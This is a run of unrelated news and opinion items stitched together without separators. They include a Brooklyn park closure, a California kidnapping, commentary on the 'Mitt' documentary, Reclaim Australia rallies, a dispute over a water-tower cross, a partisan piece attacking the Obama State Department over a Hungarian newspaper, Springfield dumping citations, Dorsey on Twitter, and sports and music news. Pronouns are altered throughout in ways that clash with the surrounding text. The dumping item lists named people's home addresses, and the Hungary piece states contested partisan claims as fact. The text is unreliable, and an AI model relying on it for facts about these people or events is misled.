The overgrown park sits above the Fulton G station and around the corner from the Brooklyn Academy of Music 's Peter Jay Sharp building , but despite the park 's name , the cultural institution is not involved with its upkeep . The site is owned by the Department of Housing Preservation and Development , which acquired it as part of an urban renewal program in the early 1980s . The buildings that once stood there had already been torn down when the department took over and designated the spot as a park . In recent years the ground beneath the park became dangerously unstable and the city locked it up .
The lot is sinking and is n't safe to be in , a spokesperson for the housing department said .
The Downtown Brooklyn Partnership recently selected an architect to re-design the park , according to the mayor 's office , and raised $ 2 million from the pro-development Empire State Development Corporation to add to money allocated by Public Advocate Letitia James when they were the neighborhood 's councilwoman , according to the housing department .
Sitting on a triangular block between Fort Greene 's brownstone blocks and the venues that make up the so-called “ Brooklyn Cultural District ” , the padlocked green triangle 's unkempt foliage stands in contrast to the lively , well-groomed , and also triangular Fowler Square directly across the diagonal intersection .
“ We 're really excited to have one more grand entrance to the cultural district , ” Kalish said . “ And to finish the other side of the bow tie . ”
There is not yet a timetable for the project , but the parks department has agreed to take over the site when its done , the housing department spokesperson said .
Reach reporter Matthew Perlman at ( 718 ) 260-8310 . E-mail them at mperlman @ c nglocal.com . Follow them on Twitter @ matthewjperlman .
Updated 10:17 pm , July 9 , 2018
©2014
Christopher Maffei ( left ) was arrested Sept. 7 , 2012 , after allegedly abducting their children Brooklynn ( center ) and Devin ( right ) and fleeing on a sailboat in California . AP Photo/South San Francisco Police Department
( CBS/AP ) SAN FRANCISCO - Christopher Maffei , a Calif. man , was arrested Friday after they allegedly abducted their two children and attempted to sail away in a stolen sailboat along the Northern California coast , authorities said .
Maffei , 43 , was booked on two counts of kidnapping , two counts of child endangerment and two counts of parental abduction , South San Francisco police Sgt . Bruce McPhillips said . They were being held on $ 200,000 bail .
McPhillips said the California father took their 3-year-old daughter Brooklynn and 2-year-old son Devin from their maternal grandmother while the children 's mother , Maffei 's former girlfriend , was in a Redwood City court on Tuesday seeking a restraining order against him .
South San Francisco police say that after running off with the children , Maffei drove to a harbor in Alameda County and stole a sailboat . They sailed the boat out the Golden Gate and headed down the coast , police said .
The FBI was notified once it was determined that Maffei had crossed county lines and stolen a boat , then the U.S. Coast Guard was called in once they sailed the boat to the coast , McPhillips said .
The Coast Guard and FBI began tracking the 40-foot sailboat named `` Unleashed '' after a fisherman spotted it off the San Mateo County coast on Friday .
The children 's rescue south of Monterey Bay around 8 p.m. Friday came hours after the Coast Guard had dispatched a HC-130 Hercules plane , a helicopter and two cutters to follow the boat as it slowly sailed down the coastline , Coast Guard officials said .
The children 's mother , Jennifer Hipon , told television reporters that they were `` blown away '' that their estranged boyfriend took the children .
`` It 's surreal that they actually did this , '' they said .
More on CrimesiderSeptember 7 , 2012 - Calif. father kidnapped kids and sailed away in stolen yacht , police say
`` Mitt , '' Netflix 's recently released documentary chronicling the two failed presidential campaigns of Willard Mitt Romney , has , on the whole , been rather well-received . And not just by the New York Post 's reliably wingnutty film critic , Kyle Smith . Business Insider 's Brett LoGiurato called it `` fantastic , '' Sahil Kapur of Talking Points Memo described it as a `` fascinatingly personal '' portrait , Time 's James Poniewozik said it was `` interesting '' and `` humanly sympathetic . ''
Not everyone believes that the film succeeds in giving viewers a behind-the-scenes look at two presidential campaigns — but most seem to have found it , at the very least , a humanizing depiction of a seemingly decent man . A few have even gone so far as to argue that `` Mitt , '' had it been released during the 2012 campaign , could 've helped Romney shed their image as a robotic plutocrat . Maybe it could 've even helped them win the election . ( Vanishingly unlikely , if one believes in political science ; but at this point , it feels somewhat churlish to point that out . )
Advertisement :
Even if the man in `` Mitt '' is not so charming and sympathetic a figure as to counterbalance the woeful policies on which they ran , there is the lingering question of why there is such a great distance between Candidate Romney and Mitt Romney . How could the same guy who at one point in the film acknowledges the immense privilege they were born into repeatedly insist , on the campaign trail , that they were a self-made man , a testament to the American meritocracy ? How could the guy who infamously sneered that roughly half of the country were irresponsible , entitled , greedy moochers seem , in another context , to be kind , thoughtful , polite and fundamentally well-meaning ?
Sure , people are complicated ; and yes , the intensity of the politico-media complex often renders us incapable of seeing the men and women on the other side as fully formed human beings until well after the final ballot is counted . That 's all true . But I think there 's another explanation , one that has more to do with power and economics than ideology and partisanship .
To explain , allow me to turn for a moment to another one of January 's most talked-about happenings in the political world : The debut ( to a wider audience , at least ) of Thomas Perkins , an octogenarian venture capitalist and multimillionaire .
Last Saturday , Perkins kicked off a full week 's worth of outrage , befuddlement and frustration when the Wall Street Journal published a letter to the editor they had written in which they compared liberal America to Nazi Germany , and the wealthiest 1 percent to the Third Reich 's Jews . Making matters worse , Perkins subsequently appeared on Bloomberg TV , ostensibly to apologize , but in truth to argue that while their warnings of a looming “ progressive Kristallnacht ” were hyperbolic , their fundamental point — that the nation 's economic 1 percent was demonized and oppressed — held true . ( The impetus for all of this , for what it 's worth , was the fact that some people had made fun of their multi-millionaire ex-wife 's oversize hedges . )
While Perkins ' ahistorical and narcissistic ramblings were roundly mocked , they also inspired greater interest in discovering whether or not their fellow members of the 1 percent felt the same way they did . As it turns out , many , if not most , of them do . Bloomberg Businessweek 's Joshua Green explained how in the Obama years , “ a class of financiers whose wealth shields them from the effects of practically any government policy has come to develop … a powerful persecution complex . ”
Politico 's Ben White took it further , reporting on how the 1 percent is seized with a consuming anxiety in response to the public 's new focus on income and wealth inequality . As one psychologist who works mainly with the hyper-rich told White , the disruption of Occupy Wall Street and the resurgence of ( a mild ) class-consciousness in American politics has created “ a worry among our clients that they are being judged and people are making assumptions about who they are based on their wealth . ”
Advertisement :
Now , if Perkins and their ilk were as isolated from American society and politics as they feel they are , this kind of “ frothing paranoia ” would still be annoying and ridiculous , but also fundamentally harmless . Plenty of people in America walk around harboring all sorts of crazy ideas and , for the most part , so long as they keep these ideas to themselves — or at least do n't force the rest of us to listen — no one gives a damn . But the problem with 1 percenters afflicted with Perkins syndrome is that , in crucial ways , they 're decidedly not set apart from the rest of America . In fact , when it comes to politics , they 're everywhere .
As the Sunlight Foundation revealed during the summer of last year , more than a quarter of all the disclosed political donations in the 2012 election ( nearly $ 6 billion ) came from a mere 31,385 people . And as the Sunlight Foundation rightly points out , these are Tom Perkins ' people :
The nation 's biggest campaign donors have little in common with average Americans . They hail predominantly from big cities , such as New York and Washington . They work for blue-chip corporations , such as Goldman Sachs and Microsoft . One in five works in the finance , insurance and real estate sector . One in 10 works in law or lobbying .
Since the very lifeblood of American politics is money , this infinitesimally small group of Americans wields an outrageously disproportionate amount of influence . These are the people any aspiring politician has to cozy up to , the people a would-be president has to massage , charm , humor and indulge . A Huffington Post report once found that members of Congress are encouraged — and not gently , mind you — to spend as much as five hours of every day fundraising .
Imagine spending five hours of every day talking to Tom Perkins and not only having to listen to their nonsense , but do so in such a way that he 'll feel inclined to give you huge amounts of money afterward as a reward . Imagine having to hear Lloyd Blankfein claim he 's doing `` God 's work '' and bite your tongue , or even nod as you reach out your palm to collect a check . Imagine having to associate yourself with vulgar 1 percenter Donald Trump .
Advertisement :
And this is just for being a member of Congress . The financial demands of running a presidential campaign are much , much worse .
So , getting back to Mitt Romney , keep in mind that during the roughly six years they were running for president — from 2006 to 2012 — Romney was spending an unfathomable amount of their time engaging in the soul-destroying process of pretending to listen , pretending to agree , pretending to care , all in the hopes of securing a big , fat paycheck … and then doing it again , and again , and again .
Think back to the infamous 47 percent video , which was taken during a high-priced Romney fundraiser . Romney 's a Republican , so I do n't doubt that on some fundamental level they believe that what separates Democrats and GOPers is an ethic of responsibility and self-reliance . But at the same time , you can easily imagine that Romney , long numb to the entire process of humoring the wealthy , was acting like any modern politician : telling their audience what it wanted to hear . And their audience wants to hear that they 're true Masters of the Universe , real champions of the meritocracy .
Advertisement :
One of the most remarked upon moments in `` Mitt '' features Josh Romney explaining why `` good people '' do n't run for office . Referring to the nonstop criticism , scrutiny and abuse a candidate for president must endure , Josh says :
This is why you do n't get good people running for president . What better guy is there than my dad ? Are they perfect ? Absolutely not . He 's made mistakes . He 's done all sorts of things wrong . But for goodness sakes , here 's a brilliant guy who 's had experience turning things around , which is what we need in this country . I mean , it 's like , this is the guy for the moment . And we 're in this , and you just get beat up constantly .
It 's a common complaint , and people of all stripes tend to enjoy bashing `` the media , '' so it has quite a few adherents . But it 's got the dynamic all wrong . It 's not what happens on the big stage , in front of all the flashing lights and snapping cameras and hovering microphones and outstretched tape recorders , that keeps `` good people '' from wanting to run . It 's what happens behind the curtain , during those thousands upon thousands of moments spent greasing the Tom Perkinses of this world , that turns a seemingly decent guy like Mitt Romney into that most vacuous and disturbing figure : the presidential nominee .
On Saturday morning in Adelaide , someone put the finishing touches to their “ all girls must finish kindy before marriage ” sign ; a woman donned their cow suit painted with the message “ do n't halal me ” ; and the Australia First Party stacked their “ Multiculturalism Means Death ” flyers before joining a thousand other Reclaim Australia supporters in Elder Park . After marching with the crowd to Parliament House , a woman stood with arms outstretched in cruciform to proudly display the Bible verse declaring , “ Jesus is the way , the truth and the life ” emblazoned on their t-shirt to all observers .
Reclaim Australia rallies : protesters clash in Melbourne and Sydney Read more
The same morning in Gerringong , New South Wales , Welcome to Australia volunteers were preparing for the first day of a camp for 120 people of eight nationalities who would spend Easter weekend surfing , eating , dancing and spending time together . A Christian campsite had donated their facilities to host volunteers , refugees and asylum seekers from Rwanda , Syria , Congo , Pakistan , Hong Kong , Australia , Afghanistan and Iran while a local church opened its Sunday schoolrooms to mostly Muslim children for activities and games .
By mid-afternoon , media outlets were sharing footage of violent scenes across the nation as Reclaim Australia supporters clashed with anti-racism activists . ReclaimJeremy – a hashtag created in response to a man who had hijacked Reclaim Australia 's Twitter account – was causing much hilarity and a Muslim refugee from Syria was reflecting on the afternoon 's impromptu dance party in Gerringong .
Suffering from post-traumatic stress disorder as a result of severe torture , it was the first time Firas ( not their real name ) had danced in more than five years . Their wife and children joined them in the dance , with dozens of new friends – both Muslim and non-Muslim . On Sunday morning , they mentioned that he 'd had their first night of sleep uninterrupted by nightmares since leaving the devastation of Syria .
These simultaneous events are analogous to the alternative futures available to our nation .
In the Reclaim Australia rallies , and the response of the “ progressive ” protestors who engaged them , we see the ugly fruit of hatred , ignorance and violent confrontation .
The inconsistencies in the Reclaim Australia argument are obvious : people of Muslim faith have lived in Australia since the 1800s ; they only make up 2 % of our population ; halal certification has no measurable impact on our daily lives ; people waving Israeli flags marching side-by-side with others brandishing swastika tattoos is cognitive dissonance at its best . Those of us on the progressive side of this argument could take issue with Reclaim Australia 's claim that , “ we 're only opposed to extremism ” , although when Pauline Hanson said , “ We have a right to have an opinion … we do n't like Islam ” she 'd already won that argument for us .
What 's less obvious is what “ progressives ” were hoping to achieve this Easter by opposing naked hatred and foul abuse with public expressions of the same hatred and abuse . Which section of society was being strategically appealed to when the Australian flag was being burned ? Did my fellow progressives imagine that they 'd turn bigots into compassionate advocates for inclusion by chanting “ F * * * off racists ” at them ? Or perhaps that Australians would be so impressed by the sheer number of progressives giving up their Easter Saturday for the cause that they 'd put their unanswered questions and latent fears aside and wholeheartedly embrace our Muslim brothers and sisters ? I count myself as a progressive , but I do n't imagine images of violence , or shouting profanities in the faces of our ideological opposites will encourage any mum or dad to join in on the next progressive rally for a “ better Australia . ”
Bill Shorten condemns violence at Reclaim Australia and counterprotests Read more
Progressives , our title suggests , want something to progress . When we contest opposing ideologies it should be in a manner that takes us closer to the society we are hoping to build . We should be tangible , visible expressions of the future we believe is possible . There should be something about the way we promote our vision for a better tomorrow that makes others want to be a part of it .
On Easter Sunday , while media outlets discussed which group of protestors were more at fault for the ugly mayhem of Saturday , a French-Australian in Gerringong was discussing their weekend ,
It was wonderful seeing my daughter and their friends dancing and playing and talking all day together . They loved being different but the same . They swam ; they danced and laughed all day . I have really appreciated understanding the background of people who shared their stories of suffering and persecution . We cried together when I realised how hard it 's been . I taught men from Afghanistan to serve . I drummed with people from Syria . And we all were friends . We all are friends .
A few dozen people dancing together in rural New South Wales does n't heal our nation 's injured social harmony – but it 's certainly a more appealing vision than the future anticipated by the hatred , violence and abuse witnessed across Australia last Saturday .
This is unbelievable .
Mayor Patrick Kitching of Alsip , Illinois intended to have a 19-foot-high cross erected on the village water tower . Why ? Because Alsip loves Jesus ( and hates Jews , Muslims , Hindus , atheists , and everyone else who lives in their village , I suppose ) . They 've been doing this for 35 years so the mayor thinks the law does n't apply to them because , you know , “ tradition . ”
Last year , after receiving a tip from a local resident , the Freedom From Religion Foundation sent Kitching a letter ( PDF ) urging them to take down the cross . It was illegal , sending a signal to citizens that the government promoted Christianity :
It is our information and understanding that a cross sits on top of the Village of Alsip water tower… We also understand that this cross is illuminated at night , making the display noticeable to all passersby including travelers on I-294 . We are told that the cross is erected each year and is lit during the weeks leading up to Christmas . From satellite images , it appears that the cross is stored year round on top of the water tower .
Kitching received the letter but just ignored it .
You know how I know that ? Because they $ % & # ing admitted it :
“ They tried to get me to take it down last year and I just ignored them , ” Kitching said .
This year , FFRF sent them another letter . It must have been much more direct about a potential lawsuit because Kitching capitulated quickly ( PDF ) :
A tradition for almost 35 years here in the Village of Alsip is coming to an end .
You will notice this year our holiday decoration on the West Water Tower ( Holiday Cross ) will not be erected nor lit . We have an organization out of Wisconsin , Freedom from Religion Foundation , who is threatening a lawsuit for having a holiday symbol that can be construed as a religious decoration . It is considered to be unconstitutional . Other municipalities have been brought to suit regarding this very same issue and have lost . We have chosen not to waste taxpayer dollars to fight a losing battle in court . The holiday cross will be replaced with a different holiday decoration in the future , however , I am not sure this process can be completed in time for Christmas of 2012 . I am very saddened by this and had hoped we would not have to change tradition , however in these economic times , the Village can not afford to waste any tax dollars on a lawsuit that simply can not be won .
Did you catch that last part ? Kitching is basically saying , “ I know this is an illegal promotion of Christianity , but I was hoping no one would notice . If we get sued by FFRF , we 're going to lose and taxpayer money will be wasted , so I 'll stop stepping all over the Constitution . ”
You do n't get credit for doing the right thing after you were forced to do it under threat of a lawsuit .
Also , notice how they use the same arguments Christians always use in these instances :
It 's “ tradition. ” ( As if doing the wrong thing for a long time makes it right . )
“ Nobody has ever complained about it. ” ( As if the minority 's silence means they are ok with everything the majority does . )
Local Christians do n't seem to get it , either :
Derrick Hughes , a village resident and a trustee at Christ United Methodist Church of Alsip , said the mayor “ should ignore the anti-religion group. ” “ This is kind of silly . I could understand this if it was derogatory like a swastika or a burning cross , ” said Hughes , 64 , who served in the Air Force . “ This ticks me off . This is about taking more of our freedoms away . What happened to freedom of speech ? My goodness , ” they said .
As anyone who 's not a Christian can tell you , the cross is just a nice Christian way of telling you you 're going to burn in hell for all eternity . There 's nothing joyous or welcoming about it if you reject the whole Christian mythology in the first place .
And no one 's taking away Christians ' freedom of speech . If Hughes wants to put a cross on their church 's lawn , no one 's going to complain about it . Ditto if they put it in their front yard .
Much like Pat Robertson did recently , Kitching thought they would also throw in a little joke about how evil FFRF was… because they called them out on breaking the law :
The village plans to replace the cross with a lighted holiday tree on the water tower , Kitching said . To avoid any potential problems , it will not be called a Christmas tree , they said . “ I thought about putting up a 30-foot Grinch , but I could n't find one , ” Kitching said .
Much like Pat Robertson , Kitching is being an asshole .
FFRF is n't trying to ruin Christmas . They 're trying to defend the Constitution . The question we should be asking is why Kitching is n't eager to do the same thing .
The Obama administration is facing criticism and ridicule after a bizarre outburst by the John Kerry-led State Department urging Hungarian authorities to prop up a defunct Communist Party propaganda organ . In an official statement , the Obama administration , which recently attacked media diversity in the United States , echoed discredited conspiracy theories pushed by communists and called on anti-communist Hungarian officials to prop up the bankrupt newspaper — supposedly to preserve “ media pluralism. ” But the ownership of the far-left paper , known as Nepszabadsag , wants to shut it down , citing growing financial losses and plunging circulation figures .
It was not immediately clear why the Obama administration had an interest in saving a radical left-wing propaganda organ reviled by many Hungarians who suffered under communism . The State Department bureaucrat , though , speaking for the administration , claimed it was about ensuring that Hungarians are exposed to a “ diversity ” of “ viewpoints. ” Hungarians , of course , were exposed to the savage communist “ viewpoint ” for decades , having suffered tremendously under a ruthless , murderous Soviet puppet regime that sought to quash all dissent using intimidation , torture , and murder as tools .
The Obama administration also called on Hungarian authorities to “ work closely ” on “ Freedom of the Media ” with a bureaucrat from the Organization for Security and Cooperation in Europe ( OSCE ) , a controversial United Nations partner organization founded and still partly controlled by brutal communist dictatorships that Obama invited to `` monitor '' U.S. elections . When and why using public money to prop up communist propaganda organs or even non-totalitarian media outlets became associated with “ freedom of the media ” was not immediately clear either .
But Obama 's officials , standing with Hungary 's re-branded Communist Party ( now dubbed “ Socialist ” ) , were clear in expressing their displeasure with the bankruptcy and subsequent shuttering of the old communist mouthpiece in Hungary . “ The United States shares the concerns of global press freedom advocates , international organizations , and Hungarian citizens , over the steady decline of media freedom in Hungary , ” claimed Obama 's Deputy State Department Spokesman Mark Toner , echoing debunked conspiracy theories instead of offering specifics on which organizations or how media freedom in Hungary was declining .
“ We are following closely the ... sudden closure of Hungary 's largest independent newspaper , Nepszabadsag , on October 8 , ” Toner continued , without explaining that its owner shut it down because it was losing money , or that it was an organ for totalitarian propaganda associated with the ruthless communist regime that enslaved Hungary . “ The loss of this paper — regardless of the reason — is a blow to media pluralism in Hungary . ”
Despite the communist-pushed conspiracy theories , the “ reason ” for closing the paper was that the ownership wanted to shut it down because , like establishment propaganda organs across the West , it was hemorrhaging money . Hungarian authorities properly pointed out that it would be “ an infringement of the freedom of the press , if we were to have a say in the decisions of a media owner , ” which it said had made a “ rational economic decision ” to shutter the money-losing newspaper .
The Obama State Department , though , called on Hungary 's pro-Western , liberty-oriented government to work with globalist institutions to satisfy its extremist demands . “ As a friend and ally , we encourage the Hungarian government to ensure an open media environment that exposes citizens to a diversity of viewpoints and opinions , a key component of our shared democratic values , ” Toner concluded . “ We urge Hungary to work closely with the OSCE Representative on Freedom of the Media and other experts towards this end . ”
The most insightful analysis of the Obama administration 's bizarre intervention in the case came from Daniel McAdams , executive director of the liberty-minded Ron Paul Institute for Peace and Prosperity . In a column published online , McAdams noted that the paper , ironically named “ People 's Liberty , ” was founded by the savage Hungarian Communist Party in 1956 . That is the year when Hungarians , prodded by the U.S. government and assured of assistance , rose up against their barbarian rulers , only to be betrayed by Washington , D.C. and then slaughtered by the Kremlin 's savage enforcers .
Ironically , the strange comments from the Obama administration came just a few days before the 60th anniversary of that uprising on October 2 , 1956 . On that date , Hungarian Prime Minister Viktor Orban rejected what they called the “ Sovietization ” of Europe led by the unelected European Union super-state . “ People who love their freedom must save Brussels from Sovietization , from people who want to tell us who we should live within our countries , ” Orban said as thousands cheered at the commemoration of the 1956 uprising against communist tyranny . “ We want to be a European nation not a nationality within Europe . ”
McAdams noted that for 30 years after that uprising , the newspaper Obama wants propped up served as the official mouthpiece of the mass-murdering puppet rulers of Hungary . Then , when the Berlin Wall came down , it was purchased by German media conglomerate Bertelsmann AG . “ But while there was a system-change in Communist Party monopoly rule in Hungary , there was never a system-change in Hungary 's former Communist Party mouthpiece , ” McAdams explained .
In the years since , Hungarians have become increasingly anti-communist , with some 70 percent of voters supporting nationalist , anti-globalist , anti-communist parties . The “ Socialist Party ” successor of the communists , meanwhile , is imploding , with just 10 percent public support . “ As might be expected when a political party implodes , readership and revenue of its mouthpiece also declines , ” McAdams observed . “ That is why Nepszabadsag racked up more than five billion forints ( $ 17.6 plus million ) in losses recently and its current owner , Mediaworks Hungary Zrt. , decided to close the loss-leading publication . ”
The whole situation would seem to be simple enough — the market rejected leftist propaganda , and so the paper should shut down . But it is not so simple , because the U.S. government , which has been propping up the re-branded communists to oppose Orban and their party , is not happy with the developments . “ Yes , the Hungarian government according to Washington has an obligation to make sure private enterprises that happen to oppose it are flush with money and remain in operation , ” McAdams said .
In a thought experiment , the liberty-minded analyst at the Ron Paul Institute wondered whether U.S. critics of U.S. government interventionism would be justified in demanding millions of tax dollars to keep their media operations afloat . “ Or does American exceptionalism mean do as we say not as we do ? ” McAdams wondered rhetorically .
Indeed , it is even worse than that . While the Obama State Department worked to ensure that Hungarians still had access to communist propaganda that they did not want , there was no intervention from Washington on behalf on media outlets banned by the UN from its “ global warming ” conference . Canadian outlet The Rebel was refused credentials for the upcoming UN COP22 “ climate ” summit in Morocco . When confronted , the UN bureaucrat in charge , Nick Nuttall , argued that the Canadian news organization had views that were not “ particularly helpful. ” Even radical warmists in government and media were shocked by the UN 's appalling attack on press freedom .
It gets even worse . Despite calls for government-enforced media “ diversity ” in Hungary by propping up communist propaganda organs , Obama is not as fond of media diversity in America . Indeed , closer to home , Obama recently lashed out at what they derided as the “ wild , wild West ” media landscape in America , outraged that “ conspiracy theorists ” and skeptics of the human-made global-warming theory had a platform to express themselves . They called for some sort of “ curating function ” to help define reality for Americans , expressing nostalgia for the days when just three establishment propaganda organs dominated the “ news ” and were “ generally ” trusted by Americans .
McAdams noted that Hungarians were then about to celebrate the 60th anniversary of their heroic uprising against bloody Soviet enslavement . “ Perhaps having escaped diktat by Moscow only to fall prey to diktat from Washington and Brussels , Budapest should revisit that 1956 spirit and at least exit the anachronistic NATO alliance , ” they added . “ Maybe then Huexit ? ” While Orban has thus far defended EU membership , they have also denounced the “ treasonous conspiracy ” of “ fanatical internationalists ” out of Brussels to destroy nation-states , Christianity , and Western civilization .
Obama 's intervention to save a communist propaganda organ is perhaps less shocking when one considers their own radical background . For instance , Obama launched their political career at the home of communist terrorist Bill Ayers , who was backed by Soviet puppet Fidel Castro while their terror group murdered police officers , bombed the Capitol and the State Department , and , according to the FBI operative who infiltrated the group , plotted to exterminate millions of anti-communist Americans in concentration camps .
It is time for Congress to rein in the increasingly lawless and radical bureaucracies and bureaucrats across the executive branch . The Obama administration has no business or authority to infringe on press freedom in the United States , Hungary , or anywhere else .
Alex Newman , a foreign correspondent for The New American , is normally based in Europe . They can be reached at This email address is being protected from spambots . You need JavaScript enabled to view it .. Follow them on Twitter @ ALEXNEWMAN_JOU .
Related articles :
As Media Credibility Dies , Obama Announces War on Free Press
Hungarian and Polish Leaders Denounce “ Sovietization ” by EU
Bailing Out Big Media ?
The Communist Nations and Western Assistance
Obama 's Political Career Began With Castro-backed Terrorist
Hungarian PM : Mass Migration a Plot to Destroy Christian West
Polish Anti-Communist Hero Was Communist Agent , Documents Show
Putin 's East vs. Globalist West : Merging Into a New World Order
UN-Linked “ Elections Monitors ” to Oversee U.S. Election
Corrupt Communist Leads Race for UN Boss
Betrayal `` made in the U.S.A . ''
SPRINGFIELD - A city crackdown on illegal dumping , begun last summer and aided by use of security cameras at various problem sites , has led to seven police citations and plans to expand the program .
Mayor Domenic J. Sarno and Police Commissioner John Barbieri , and Parks , Buildings and Recreation Director Patrick Sullivan announced the results of the crackdown on Tuesday .
Clean City Manager Richard Mastroianni and Park Environmental Specialist Edward Brunton have been maintaining security cameras at multiple sites throughout the city that are used often for illegal dumping activity , officials said .
`` Providing a high quality of life for our residents and businesses is a top priority of my administration , '' Sarno said in a prepared release . `` We will continue to do what is necessary to ensure that our city maintains a high standard of cleanliness and we will prosecute those who wish to blemish the beauty of our Springfield . With the use of these portable cameras and as Alan Funk would say ; Smile you 're on Candid Camera ''
Barbieri said there `` zero tolerance '' for the illegal dumping . They were joined by announcing the result with Patrick J. Sullivan , the city 's director of parks , buildings and recreation management .
The following persons have been caught illegally dumping as part of this effort and were cited by the Springfield Police Department , according to the release .
The following were cited for dumping behind 1284 Boston Road , along with a description of the offense :
Scott F. Aurnhammer of 903 West Street , Ludlow , for allegedly dumping televisions on Jan. 2 , 2015 .
Gessica Mejias of 2191-Page Blvd. , Springfield , for allegedly dumping tires on Feb. 28 , 2015 .
Merilin Ramos of 221 Beacon Circle , Springfield , for allegedly dumping tires on March 19 , 2015 , .
The following were cited for dumping on Moxon Street in Indian Orchard :
Jaynette Rodriguez of 176 Centre Street , Indian Orchard , for allegedly dumping a large amount of trash in September 2014 .
Marc S. Giles , 6 East Laramee Green , Springfield , for allegedly dumping trash , yard waste and cinder blocks on Sept. 30 , 2014 .
Luis Curbelo Jr. of 113 Center Street , Ludlow , for allegedly dumping a car battery on Aug. 19 , 2014 .
Mariana Rodriguez of 125 Verge Street , Springfield , for allegedly dumping mattresses on June 27 , 2014 .
City ordinances allow for a fine of up to $ 300 for anyone caught illegally dumping on property owned by the city Parks Department .
Twitter has evolved from being a microblogging tool used by early adopting nerds , to being a media broadcasting tool , a microphone for celebrities , and beyond . But as the social network struggles to find new ways to keep people using it and lure new users on board , it has experimented with new approaches , such as curated tweets and a new algorithmic timeline . And these changes represent an idea Twitter has been pushing — that Twitter is a place to consume content rather than just to create it .
As Twitter celebrates 10 years since the first very first tweet was sent , cofounder — and recently returned CEO — Jack Dorsey has taken to Bloomberg to answer some questions on where the social network has come from and where it could go from here .
“ In the past , when people heard about Twitter , they assumed that the way to use it was you had to tweet about something , ” said Dorsey . “ I think more and more people are seeing it as , ‘ I can just see what 's happening in the world . I can see what 's happening about any event . ' And the faster we make it for people to realize that , we grow this amazing daily audience around any particular event around the globe . ”
But what Twitter is focusing on , specifically , is the concept of the here and now , the so-called real time , the “ live. ” Almost exactly a year ago , Twitter launched its live-video app Periscope , a tool that lets anyone broadcast their life events to the world as they happen . Perhaps one of the best , funniest , and most-engaging use-cases for Periscope ( beyond pirating live sporting events ) was the famous puddle in England , which became a global talking point when someone set up their phone to film people circumventing a gargantuan body of water in a Newcastle street . At one point the puddle garnered 650,000 viewers around the world , and though the event itself was inherently mundane , it is something that Dorsey reckons helps to highlight the power of Twitter and Periscope as “ live ” social tools .
It was n't that we were watching a puddle . It was that we were watching a puddle together . Like , ‘ Is n't this crazy ? We 're actually watching this puddle . ' I was watching the puddle . It was n't even the people in the puddle or what they were doing . It was the fact that I was watching with other people , and I was connected to the audience , and I could actually talk with them , and I could say , ‘ Is n't this ridiculous ? We 're watching a puddle . ' And then : ‘ Oh , is that woman going to walk around it ? Are they going to get wet ? Like , what 's going to happen ? ' And it was just so cool to see how this little tiny thing became an event . But that 's been our history for 10 years . It 's a lot of the same idea .
Can an “ insignificant ” incident such as a puddle serve as an example not only of what made Twitter popular to begin with , but also of what could help it thrive 10 years from now ? Dorsey thinks so . Indeed , the Twitter chief talks about how virtual reality and augmented reality are the big talking points of the moment , and the latter of these trends is something that Twitter has been doing since its inception , and will continue to do in the future .
Twitter has been augmenting reality for 10 years . You watch any game , you watch any live event , you watch any political debate , Twitter makes it more interesting , funnier , entertaining . I think Periscope takes that a step further by actually pulling them together on one screen . So if you were to very humbly think of Twitter as a chat room — a global chat room — it 's been this room that people talk about the world and what 's happening in the world nonstop . And you see the same thing with Periscope . You 've got these chat rooms on top of a live video stream . And that 's created some really surprising interactions .
While Dorsey points to Twitter 's speed in being able to report on live events as its primary value — the ability to , for example , break and discuss major news stories — even when there is nothing particularly noteworthy to talk about , the global masses collaborate to create something newsworthy to talk about , from the What color is this dress ? meme , to , indeed , puddles .
“ So in the future , I think we can continue to augment reality in a very interesting way , in that it provides a conversation around anything that 's happening in the world , ” they added .
You can read The Future of Twitter : Q & A with Jack Dorsey over on Bloomberg now .
After a series of incidents , Jeremih has been removed from PARTYNEXTDOOR 's Summer 's Over Tour , a Live Nation representative has confirmed to Pitchfork . “ We 've decided it 's best for the Summer 's Over Tour to continue without Jeremih , effective immediately , ” a statement reads . “ After multiple incidents we are left with no other choice . We do not support these actions or take these actions lightly. ” Full refunds will be issued for fans that wanted to see Jeremih , which will obviously forfeit entry to the entire show . Find the full statement below .
In recent weeks , there has allegedly been infighting on the tour over making Jeremih a co-headliner . During and after the tour 's Houston show , rumors began swirling that Jeremih sent an imposter to perform in their place because of the dispute . The protests became less passive-aggressive when Jeremih dissed PND on stage the next night at their Dallas show . “ PARTYNEXTDOOR and their crew are some bitch ass niggas . Now tell me that . Tell me what I said now ? ” they said , before adding , “ Tell them to pay that fake-ass budget they 've been pressing at night . ”
The full Live Nation statement :
West Ham United are delighted to announce the signing of highly-rated full-back Sam Byram from Leeds United
West Ham United are delighted to announce the signing of highly-rated full-back Sam Byram from Leeds United .
The Essex-born player joins the Hammers , who have fought off strong competition to capture the promising 22-year-old , on a four-and-a-half year contract for an undisclosed fee .
A technically-gifted , fast and athletic attacking right-back or right midfielder , Byram has moved to the Boleyn Ground after four outstanding seasons in the first team at Elland Road – and can not wait to get their Claret and Blue career under way .
“ I 'm unbelievably proud and happy to join a Club as big as this , ” said Byram , who will wear the No22 shirt . “ I 'm just looking forward to what the future holds and hopefully I can achieve things with the team going forward .
“ It 's a childhood dream of mine to play in the Premier League , so to have the chance to get into a team like this and I just want to get my head down , work hard and hopefully get a chance .
“ I spoke to the manager and they are one of the main reasons which attracted me to West Ham . I think he 's done unbelievably well with their team so far , so I 'm really looking forward to working with them and their staff .
“ My uncle and my cousin are big West Ham fans and have bought their tickets for the new Stadium . My uncle was down here yesterday getting a shirt with my name on the back ! It 's nice to have them down here and they 'll help me settle so I 'm looking forward to seeing them .
“ I 'm also really looking forward to seeing the new Stadium in person . That was another big part in me wanting to come here . It 's a massive part of the future of the Club and I ca n't wait to see and hopefully play in it . ”
Born in Thurrock , Byram moved to Yorkshire as a child and grew up in York , playing for the city 's Schools team before joining Leeds United at the age of eleven in 2005 .
The 6 ' 0 player came through the Academy before establishing themselves in The Peacocks ' first-team squad at the start of the 2012/13 season .
Byram made their Leeds debut in a League Cup victory over Shrewsbury Town in August 2012 , scoring their maiden goal against Oxford United later the same month . Then just 19 , they totalled 53 appearances and made a clean sweep of Leeds ' end-of-season Player Awards .
Despite being repeatedly linked with a move to the Premier League , Byram remained loyal to the Whites , being moved into a more advanced right wing position last season . They depart Elland Road having made 143 appearances and scored ten goals .
An impressive December 2015 saw Byram score three goals for Leeds and be named The Championship Player of the Month , and West Ham fans will hope they continue that outstanding form in a Claret and Blue shirt .
LUAS staff who are taking part in the strike action this week will be docked up to four days pay in their next month 's salary .
LUAS staff who are taking part in the strike action this week will be docked up to four days pay in their next month 's salary .
LUAS staff to be docked up to four days pay this month due to strike action
